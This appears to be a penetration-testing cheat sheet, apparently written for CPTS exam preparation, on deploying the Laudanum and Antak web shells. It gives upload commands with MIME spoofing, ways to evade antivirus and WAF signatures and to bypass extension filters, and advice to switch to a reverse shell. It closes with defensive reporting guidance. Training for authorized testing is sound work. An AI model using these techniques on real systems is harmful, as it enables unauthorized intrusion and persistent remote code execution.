π‘οΈ Methodology Checklist
- Identify web server language (PHP, ASPX, JSP)
- Copy Laudanum shell:
/usr/share/webshells/laudanum/ - Upload shell via file upload vulnerability or write path
- Access shell at uploaded URL
- Laudanum: interactive command execution in browser
- Antak (ASPX): PowerShell web shell for Windows IIS
- Clean up web shell after engagement
π― Operational Context
Use when: You have file write to a web root (via LFI, unrestricted upload, or RCE) and need a feature-rich persistent web shell.
Think Dumber First: Laudanum PHP web shell is in /usr/share/webshells/laudanum/ on Kali. Upload php/shell.php via file upload vuln. Access at http://[TARGET]/uploads/shell.php. Antak is ASP.NET variant for IIS targets β check for .aspx support first.
Skip when: Simple PHP one-liner is sufficient β avoid overhead of feature-rich shells that have more detection surface.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
ls /usr/share/laudanum/ | List Laudanum shell templates (ASP, ASPX, JSP, PHP) |
cp /usr/share/laudanum/aspx/shell.aspx /home/tester/demo.aspx | Copy Laudanum shell to working dir |
cp /usr/share/nishang/Antak-WebShell/antak.aspx /home/attacker/upload.aspx | Copy Antak shell to working dir |
nano demo.aspx | Edit Laudanum β add attacker IP to allowedIps array (line ~60) |
nano upload.aspx | Edit Antak β set username/password credentials (line ~14) |
curl -X POST -F "file=@shell.aspx;type=image/png" http://[DOMAIN]/upload.php | Upload with MIME type spoofing |
π¬ Deep Dive & Workflow
Laudanum β Pre-Made Web Shells
Pre-built injectable files for ASP, ASPX, JSP, PHP. Installed by default on Kali/Parrot.
Path: /usr/share/laudanum/
Workflow:
# 1. Copy (never edit originals)
cp /usr/share/laudanum/aspx/shell.aspx ./demo.aspx
# 2. Configure: find allowedIps (~line 60) and add your tun0 IP
# string[] allowedIps = new string[] { "127.0.0.1", "::1", "10.10.14.x" };
# 3. AV bypass: remove ASCII art and comments at top of file
# (These are signatured by Windows Defender / WAFs)
# 4. Upload via target's vulnerable upload function
# 5. Access via browser
# http://[TARGET]/files/demo.aspxCPTS Exam Tips:
- If you get 403 Forbidden: you forgot to add your VPN IP to
allowedIps - Windows paths use
\but URLs use/β convert when building the access URL - Verify youβre using ASP vs ASPX based on what IIS is running
Antak β PowerShell Web Console (ASPX)
Part of the Nishang framework. Acts as a PowerShell terminal in the browser. Target: Windows IIS.
Path: /usr/share/nishang/Antak-WebShell/
Workflow:
# 1. Copy to workspace
cp /usr/share/nishang/Antak-WebShell/antak.aspx ./upload.aspx
# 2. Set credentials (line ~14)
# string User = "admin";
# string Pass = "p4ssw0rd";
# 3. Remove ASCII art and comments (AV bypass)
# 4. Upload to target
# 5. Access via browser β you'll see a login prompt
# http://[TARGET]/files/upload.aspx
# 6. Execute PowerShell commands in white input box (below blue read-only output box)Antak Limitations:
- Commands run as new processes β no persistent
cdbetween executions - Chain commands:
cd C:\Users; Get-ChildItem - Blue box is read-only output β type in white box below it
- If input box is missing: browser rendering issue β use Laudanum instead
Web Shell Comparison
| Shell | Language | Target OS | Auth | Interface |
|---|---|---|---|---|
| Laudanum (aspx) | ASPX | Windows IIS | IP whitelist | Command input box |
| Laudanum (php) | PHP | Linux/Apache | IP whitelist | Command input box |
| Antak | ASPX | Windows IIS | Username/Password | PowerShell console UI |
Common OPSEC Failures
- Uploading without editing
allowedIpsβ gets caught/blocked - Leaving ASCII art / author comments β AV signature match
- Not recording upload path and filename β canβt find shell later or clean up
- Using web shell as permanent access β convert to reverse shell ASAP then remove web shell
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Laudanum shell blocked by WAF | Signature match on known shell | Modify PHP shell: rename functions, add random comments, change variable names |
| Antak ASPX shell returns 500 | .NET version mismatch | Check target .NET version; ensure <%@ Page Language="C#" %> matches available runtime |
| Shell accessible but no command output | Disabled functions | Check phpinfo() for disable_functions; try alternatives: shell_exec, passthru, proc_open |
| File upload rejected | MIME type or extension filter | Rename to .php5, .phtml, .phar; change Content-Type to image/jpeg in Burp |
| Web shell returns blank page | Output buffering | Add ob_flush(); flush(); after command execution in PHP shell |
π Reporting Trigger
Finding Title: Web Shell Deployed via Unrestricted File Upload
Impact: Attacker-controlled web shell provides persistent RCE on the web server, enabling lateral movement, credential theft, and ongoing access independent of the initial vulnerability.
Root Cause: File upload functionality permits server-side executable files without validation of content type, extension, or file content.
Recommendation: Implement strict file upload validation: allowlist extensions, verify MIME type against content, rename uploaded files, store outside web root. Deploy WAF with web shell detection rules. Monitor for new .php/.aspx files in upload directories.